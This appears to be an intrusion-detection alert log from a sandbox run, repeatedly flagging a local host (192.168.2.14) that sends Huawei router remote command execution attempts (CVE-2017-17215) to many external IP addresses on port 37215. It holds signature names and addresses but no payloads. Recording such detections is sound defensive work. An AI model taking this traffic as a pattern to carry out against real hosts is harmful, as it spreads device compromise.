                                            06/14/24-10:44:00.339746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5769837215192.168.2.14197.156.42.214
                                            06/14/24-10:44:33.132467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600637215192.168.2.14197.83.176.168
                                            06/14/24-10:44:20.827500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862237215192.168.2.14156.241.199.73
                                            06/14/24-10:43:45.967921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715037215192.168.2.14197.63.228.118
                                            06/14/24-10:44:20.803456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914637215192.168.2.14156.60.220.19
                                            06/14/24-10:44:22.862340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944837215192.168.2.14156.180.233.151
                                            06/14/24-10:43:45.968651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918637215192.168.2.14197.107.128.231
                                            06/14/24-10:43:39.812397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032637215192.168.2.14156.138.108.172
                                            06/14/24-10:44:33.151337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559237215192.168.2.1441.7.225.184
                                            06/14/24-10:44:16.736421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810237215192.168.2.14156.215.183.231
                                            06/14/24-10:43:56.226035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915437215192.168.2.14197.144.20.50
                                            06/14/24-10:44:22.879938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660237215192.168.2.1441.73.26.40
                                            06/14/24-10:44:10.547103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4711237215192.168.2.14156.17.133.92
                                            06/14/24-10:44:08.518885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4193837215192.168.2.14197.147.182.110
                                            06/14/24-10:44:04.424724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388037215192.168.2.14156.179.189.84
                                            06/14/24-10:44:12.647198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4740837215192.168.2.14197.190.19.133
                                            06/14/24-10:44:10.544731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3917637215192.168.2.14197.237.138.157
                                            06/14/24-10:44:33.151514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396037215192.168.2.14156.218.225.90
                                            06/14/24-10:43:54.184183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4565637215192.168.2.14156.198.45.172
                                            06/14/24-10:44:02.368079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430237215192.168.2.14197.212.211.63
                                            06/14/24-10:44:06.453540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937637215192.168.2.1441.12.117.248
                                            06/14/24-10:43:54.202737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598837215192.168.2.1441.96.124.60
                                            06/14/24-10:44:24.913439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5873837215192.168.2.14197.80.61.14
                                            06/14/24-10:44:31.081643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3949437215192.168.2.14197.29.10.182
                                            06/14/24-10:43:58.295708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5609637215192.168.2.14156.69.26.105
                                            06/14/24-10:44:16.718315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889637215192.168.2.14156.247.211.85
                                            06/14/24-10:44:20.830750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928237215192.168.2.14156.189.102.48
                                            06/14/24-10:43:54.183865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822237215192.168.2.14156.246.143.10
                                            06/14/24-10:44:20.806151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5706437215192.168.2.14156.7.86.124
                                            06/14/24-10:44:22.879444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890037215192.168.2.1441.219.129.101
                                            06/14/24-10:44:04.408825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256437215192.168.2.14197.180.159.91
                                            06/14/24-10:44:08.503707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816637215192.168.2.14156.162.120.65
                                            06/14/24-10:44:16.718186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080837215192.168.2.1441.91.97.34
                                            06/14/24-10:44:31.055509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315637215192.168.2.14156.38.43.63
                                            06/14/24-10:43:39.812011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105237215192.168.2.14197.33.210.243
                                            06/14/24-10:44:29.014559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4241237215192.168.2.14156.74.241.66
                                            06/14/24-10:43:54.203026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997837215192.168.2.14197.32.209.205
                                            06/14/24-10:44:29.013828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555237215192.168.2.1441.223.199.231
                                            06/14/24-10:43:50.112048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716437215192.168.2.1441.106.0.63
                                            06/14/24-10:44:20.806972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353237215192.168.2.14197.208.218.191
                                            06/14/24-10:44:08.517485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464437215192.168.2.14156.251.101.196
                                            06/14/24-10:44:00.325137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6097837215192.168.2.14197.29.245.62
                                            06/14/24-10:44:14.671014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984437215192.168.2.14156.41.226.3
                                            06/14/24-10:44:31.052072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947637215192.168.2.1441.36.135.77
                                            06/14/24-10:43:58.276446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598637215192.168.2.1441.20.142.8
                                            06/14/24-10:44:02.381229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779037215192.168.2.1441.248.222.17
                                            06/14/24-10:44:33.133695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015837215192.168.2.14197.216.177.48
                                            06/14/24-10:44:24.941928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821437215192.168.2.14197.141.163.138
                                            06/14/24-10:43:36.700207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590437215192.168.2.14197.54.76.33
                                            06/14/24-10:44:24.916463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759637215192.168.2.14197.114.152.113
                                            06/14/24-10:43:39.813053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5075637215192.168.2.14156.0.58.74
                                            06/14/24-10:43:52.163666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503037215192.168.2.1441.197.136.117
                                            06/14/24-10:43:56.229066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607437215192.168.2.1441.107.32.161
                                            06/14/24-10:43:52.146967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420637215192.168.2.14156.73.172.179
                                            06/14/24-10:44:24.944487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281237215192.168.2.14156.20.240.83
                                            06/14/24-10:44:00.324465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4675437215192.168.2.1441.206.217.168
                                            06/14/24-10:43:48.029789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636837215192.168.2.1441.35.94.148
                                            06/14/24-10:43:45.965393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781237215192.168.2.14197.183.35.97
                                            06/14/24-10:44:16.717523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236237215192.168.2.1441.26.89.85
                                            06/14/24-10:44:22.860755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193637215192.168.2.14197.175.117.179
                                            06/14/24-10:43:45.990962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4795437215192.168.2.14197.27.116.207
                                            06/14/24-10:43:36.717214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703437215192.168.2.14156.88.226.133
                                            06/14/24-10:43:56.230443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4657237215192.168.2.1441.49.82.252
                                            06/14/24-10:44:02.383671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298437215192.168.2.14197.200.225.148
                                            06/14/24-10:44:10.567515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922037215192.168.2.14197.137.147.49
                                            06/14/24-10:44:18.763396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3546237215192.168.2.14197.3.196.123
                                            06/14/24-10:43:52.160887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565437215192.168.2.14156.106.25.251
                                            06/14/24-10:44:31.054404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222637215192.168.2.1441.10.51.123
                                            06/14/24-10:44:10.565625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5075437215192.168.2.14197.52.160.67
                                            06/14/24-10:44:00.340171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618837215192.168.2.14156.91.222.16
                                            06/14/24-10:44:04.410831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558837215192.168.2.1441.6.115.49
                                            06/14/24-10:43:50.115996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5043637215192.168.2.14197.192.92.129
                                            06/14/24-10:43:56.252996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4354437215192.168.2.14197.56.232.222
                                            06/14/24-10:43:37.760406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512837215192.168.2.14156.0.162.30
                                            06/14/24-10:44:27.001169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523037215192.168.2.1441.139.236.140
                                            06/14/24-10:43:52.163387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312437215192.168.2.14156.174.110.77
                                            06/14/24-10:43:34.676941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257037215192.168.2.14197.247.234.164
                                            06/14/24-10:44:35.182631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187837215192.168.2.14197.149.19.119
                                            06/14/24-10:43:36.702431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3746237215192.168.2.14156.99.153.2
                                            06/14/24-10:43:41.912830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930837215192.168.2.1441.137.157.245
                                            06/14/24-10:43:56.244442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913437215192.168.2.1441.251.151.200
                                            06/14/24-10:43:45.966011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4546037215192.168.2.14156.163.9.163
                                            06/14/24-10:44:29.025673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529437215192.168.2.14156.125.34.132
                                            06/14/24-10:43:48.045398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982637215192.168.2.1441.41.170.128
                                            06/14/24-10:43:34.662270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855637215192.168.2.14156.131.196.119
                                            06/14/24-10:44:18.766268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461437215192.168.2.14197.42.59.210
                                            06/14/24-10:43:56.229747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368237215192.168.2.1441.149.107.105
                                            06/14/24-10:44:35.178912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332637215192.168.2.14156.202.200.12
                                            06/14/24-10:44:14.681847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414037215192.168.2.1441.137.74.82
                                            06/14/24-10:43:45.968836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695437215192.168.2.1441.230.196.231
                                            06/14/24-10:44:16.716368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492637215192.168.2.14156.129.185.99
                                            06/14/24-10:43:52.146945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382037215192.168.2.14156.90.35.238
                                            06/14/24-10:44:04.410959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515437215192.168.2.1441.109.29.14
                                            06/14/24-10:43:56.228728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223437215192.168.2.14156.0.147.70
                                            06/14/24-10:43:39.788962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050037215192.168.2.14156.248.173.7
                                            06/14/24-10:44:10.548932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026837215192.168.2.14197.178.184.90
                                            06/14/24-10:44:29.009911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4619637215192.168.2.1441.1.1.201
                                            06/14/24-10:44:02.384331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411037215192.168.2.1441.82.81.19
                                            06/14/24-10:44:29.025397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325037215192.168.2.1441.145.128.25
                                            06/14/24-10:44:20.806431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496637215192.168.2.1441.57.241.130
                                            06/14/24-10:43:48.045901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488437215192.168.2.1441.55.60.154
                                            06/14/24-10:43:58.274480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5676437215192.168.2.1441.164.46.13
                                            06/14/24-10:43:39.792602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683237215192.168.2.14197.67.192.248
                                            06/14/24-10:43:58.295530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5884237215192.168.2.14156.179.154.204
                                            06/14/24-10:43:34.663064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243637215192.168.2.14197.42.188.77
                                            06/14/24-10:43:36.724549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5510437215192.168.2.14197.25.195.106
                                            06/14/24-10:44:20.804875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183637215192.168.2.1441.60.251.40
                                            06/14/24-10:44:24.943423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3360437215192.168.2.14156.245.165.86
                                            06/14/24-10:44:08.502481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084037215192.168.2.14197.152.68.189
                                            06/14/24-10:44:02.365783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3367437215192.168.2.14156.159.145.44
                                            06/14/24-10:43:39.790738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914637215192.168.2.14197.204.104.170
                                            06/14/24-10:44:10.542872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3460837215192.168.2.1441.211.115.23
                                            06/14/24-10:44:02.367211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3409037215192.168.2.14156.169.59.197
                                            06/14/24-10:44:33.134666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093237215192.168.2.1441.141.180.72
                                            06/14/24-10:43:54.183380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5769037215192.168.2.14156.167.10.185
                                            06/14/24-10:43:52.148054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5215837215192.168.2.1441.237.29.65
                                            06/14/24-10:43:41.910548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964837215192.168.2.14156.107.78.164
                                            06/14/24-10:44:31.056378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644437215192.168.2.14197.50.133.30
                                            06/14/24-10:44:08.517485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464437215192.168.2.14156.251.101.196
                                            06/14/24-10:43:43.944267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014437215192.168.2.1441.179.216.10
                                            06/14/24-10:43:34.674866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4687837215192.168.2.14197.74.88.212
                                            06/14/24-10:44:20.804976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799037215192.168.2.14156.123.199.117
                                            06/14/24-10:44:00.337790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680037215192.168.2.14197.121.229.254
                                            06/14/24-10:43:56.244119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695237215192.168.2.14197.249.95.142
                                            06/14/24-10:44:12.640989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065637215192.168.2.14197.198.174.87
                                            06/14/24-10:44:31.088807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998237215192.168.2.14156.41.13.69
                                            06/14/24-10:44:14.671384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575437215192.168.2.1441.252.221.112
                                            06/14/24-10:43:48.031159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193037215192.168.2.14156.73.54.95
                                            06/14/24-10:44:31.094882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090637215192.168.2.14156.52.76.251
                                            06/14/24-10:44:20.804308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5647437215192.168.2.1441.100.115.242
                                            06/14/24-10:44:14.672571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4478237215192.168.2.14156.48.199.48
                                            06/14/24-10:44:14.669674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997837215192.168.2.14156.60.250.80
                                            06/14/24-10:43:36.699343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5807237215192.168.2.14197.168.250.8
                                            06/14/24-10:43:36.718612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283037215192.168.2.1441.101.141.48
                                            06/14/24-10:43:41.848956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3425837215192.168.2.14156.218.2.40
                                            06/14/24-10:44:08.503487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3436237215192.168.2.1441.9.240.88
                                            06/14/24-10:44:04.421597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4714437215192.168.2.14156.218.202.131
                                            06/14/24-10:43:37.772213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5012837215192.168.2.1441.41.112.171
                                            06/14/24-10:44:18.766353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5380837215192.168.2.14197.64.146.234
                                            06/14/24-10:44:16.732139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5404637215192.168.2.1441.169.179.117
                                            06/14/24-10:44:16.735543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331637215192.168.2.1441.87.68.2
                                            06/14/24-10:43:56.227898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910637215192.168.2.14197.172.248.167
                                            06/14/24-10:43:58.291141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5736037215192.168.2.1441.45.11.172
                                            06/14/24-10:44:06.452141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721837215192.168.2.14156.124.130.111
                                            06/14/24-10:43:36.704166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319837215192.168.2.1441.146.47.30
                                            06/14/24-10:43:34.675960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.14156.95.138.20
                                            06/14/24-10:44:18.765936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3789837215192.168.2.14156.223.132.248
                                            06/14/24-10:43:45.965682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854437215192.168.2.14156.249.167.129
                                            06/14/24-10:44:06.470581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507837215192.168.2.14197.1.126.73
                                            06/14/24-10:44:16.733288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939837215192.168.2.14156.158.15.160
                                            06/14/24-10:44:18.779220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742437215192.168.2.14197.43.79.29
                                            06/14/24-10:43:52.164536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3466837215192.168.2.1441.161.3.243
                                            06/14/24-10:44:26.979100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4699037215192.168.2.14197.84.147.17
                                            06/14/24-10:44:20.828092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5996637215192.168.2.14156.145.109.216
                                            06/14/24-10:43:48.018211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552237215192.168.2.14156.174.28.191
                                            06/14/24-10:43:56.243525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372837215192.168.2.14197.131.245.239
                                            06/14/24-10:43:36.702550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778437215192.168.2.1441.196.33.190
                                            06/14/24-10:44:10.545670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4462237215192.168.2.1441.94.49.255
                                            06/14/24-10:43:39.791556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4744837215192.168.2.1441.36.117.78
                                            06/14/24-10:43:48.018352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379837215192.168.2.14156.7.172.22
                                            06/14/24-10:44:14.670731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132637215192.168.2.14197.165.64.230
                                            06/14/24-10:43:58.274853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897037215192.168.2.1441.176.116.189
                                            06/14/24-10:44:22.861130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314237215192.168.2.14197.102.173.38
                                            06/14/24-10:44:08.504411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221837215192.168.2.14156.41.100.179
                                            06/14/24-10:44:24.916170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615237215192.168.2.1441.15.59.19
                                            06/14/24-10:44:06.473697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5549637215192.168.2.14156.61.171.13
                                            06/14/24-10:43:36.729210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503437215192.168.2.14197.91.127.203
                                            06/14/24-10:43:54.184599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613837215192.168.2.14197.114.190.125
                                            06/14/24-10:43:36.725188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4731637215192.168.2.14156.70.174.21
                                            06/14/24-10:44:18.766784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636037215192.168.2.14197.167.203.53
                                            06/14/24-10:43:50.115533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773637215192.168.2.1441.160.75.101
                                            06/14/24-10:43:58.274609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819837215192.168.2.14197.124.39.122
                                            06/14/24-10:43:34.662967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258437215192.168.2.14156.45.119.80
                                            06/14/24-10:44:33.133147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974437215192.168.2.14156.57.213.92
                                            06/14/24-10:44:14.669302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5985037215192.168.2.1441.98.23.60
                                            06/14/24-10:44:06.449656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229437215192.168.2.14197.24.71.53
                                            06/14/24-10:43:36.724976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710237215192.168.2.1441.171.192.181
                                            06/14/24-10:44:00.340144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614237215192.168.2.14197.83.42.101
                                            06/14/24-10:43:50.073094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959037215192.168.2.1441.14.62.79
                                            06/14/24-10:43:48.018312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843637215192.168.2.14156.226.85.177
                                            06/14/24-10:43:41.846742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5654837215192.168.2.14156.2.146.186
                                            06/14/24-10:43:58.277158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216637215192.168.2.1441.138.28.118
                                            06/14/24-10:43:58.292582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901037215192.168.2.14156.208.202.8
                                            06/14/24-10:44:26.978215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991237215192.168.2.14156.132.31.221
                                            06/14/24-10:44:33.133014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5175237215192.168.2.1441.101.165.48
                                            06/14/24-10:43:58.275002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499837215192.168.2.14197.89.180.190
                                            06/14/24-10:44:14.684516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275637215192.168.2.14197.54.35.75
                                            06/14/24-10:44:12.617413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253637215192.168.2.14197.42.198.82
